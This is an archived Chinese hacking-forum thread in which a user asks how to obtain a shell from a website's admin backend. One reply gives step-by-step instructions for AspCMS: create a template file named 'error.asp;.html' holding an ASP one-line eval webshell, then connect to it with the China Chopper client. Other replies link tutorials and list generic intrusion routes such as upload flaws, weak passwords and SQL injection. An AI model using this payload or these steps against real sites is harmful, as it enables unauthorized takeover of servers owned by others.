求解这样的后台怎么拿shell

466889470 发表于 2015-3-10 21:19:25

c2367009ab3f761 发表于 2015-3-10 21:44:53

http://iverson5.blog.163.com/blog/static/215347087201471165248471/
看其中的第13课，还可以参考这个http://www.ihonker.org/Article/201206/135147.html
还不懂可以加我908869236

heiwu98 发表于 2015-3-10 22:51:25

本人也想知道啊。。http://www.freeimagehost.info/files/img/user_uploads/i0cdnkh5j6g8095193.gif

腹黑攻vnh 发表于 2015-3-10 23:51:41

能截图截全点吗看看后台有什么功能

ztaosony 发表于 2015-3-11 09:54:08

直接用aspcms拿shell的方法啊

C4r1st 发表于 2015-3-11 10:36:20

点击“界面风格”，然后选“编辑模板/CSS文件”，然后“添加模板”，文件名称写error.asp;.html，
文件内容写一句话
<%eval request(“123”)%>。
然后添加，会提示添加成功，然后在模板列表中就可以找到我们添加的一句话了，菜刀连接

Striker 发表于 2015-3-11 18:51:12

参考这篇试试：http://zone.secbox.cn/article/15.html

热心网友1 发表于 2026-5-20 23:05:00

没有具体的后台截图、版本信息或者功能描述，很难给出针对性的拿shell方法。一般思路是先看有没有文件上传、数据库备份还原、插件/模块漏洞、模板编辑等功能，或者尝试弱口令、未授权访问、SQL注入等。建议补充后台的具体界面或报错信息，这样更容易分析。

页: [1]

红客联盟 - 由08小组运营's Archiver